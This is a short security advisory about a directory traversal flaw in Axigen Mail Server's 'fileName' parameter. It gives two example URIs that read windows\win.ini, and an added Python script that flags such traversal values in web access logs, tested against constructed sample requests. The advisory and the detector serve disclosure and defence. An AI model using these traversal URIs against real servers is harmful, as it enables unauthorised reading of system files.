Axigen Mail Server 'fileName' Parameter Directory Traversal Vulnerability

Attackers can exploit this issue through a browser.

The following example URIs are available:

http://www.example.com/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini

http://www.example.com/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini
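
For defenders reviewing web access logs, the following Python check flags requests whose fileName parameter contains a parent-directory segment or an absolute path, as in the URIs above. It is an added example, not part of the original advisory or of Axigen's code; the sample request lines are constructed and the h value is a placeholder.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# A ".." segment bounded by either separator, or by the start/end of the value.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Absolute paths: drive letter, or a leading slash/backslash (rooted or UNC).
ABSOLUTE = re.compile(r"^([A-Za-z]:|[\\/])")

def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so encoded separators are compared in plain form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_filenames(request, param="fileName"):
    """Return decoded values of `param` that point outside the intended directory."""
    hits = []
    query = urlsplit(request).query
    for key, raw in parse_qsl(query, keep_blank_values=True):
        if key.lower() != param.lower():
            continue
        value = fully_decode(raw)  # parse_qsl has already decoded once
        if TRAVERSAL.search(value) or ABSOLUTE.match(value):
            hits.append(value)
    return hits

# Constructed request lines (h=0 is a placeholder session value).
SAMPLE_REQUESTS = [
    r"/?h=0&page=vlf&action=edit&fileName=..\..\..\windows\win.ini",
    "/source/loggin/page_log_dwn_file.hsp?h=0&action=download"
    "&fileName=..%5c..%5cwindows%5cwin.ini",
    "/?h=0&page=vlf&action=edit&fileName=%252e%252e%255cwin.ini",
    "/?h=0&page=vlf&action=edit&fileName=everything.txt",
]

def flag_requests(requests):
    """Pair each flagged request with the decoded values that triggered it."""
    return [(r, v) for r in requests if (v := suspicious_filenames(r))]

if __name__ == "__main__":
    for request, values in flag_requests(SAMPLE_REQUESTS):
        print("FLAG", values, "<-", request)
```

The pattern only matches ".." as a whole path segment, so ordinary names such as report..2010.log are not flagged.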


 

Copyright 2010, SecurityFocus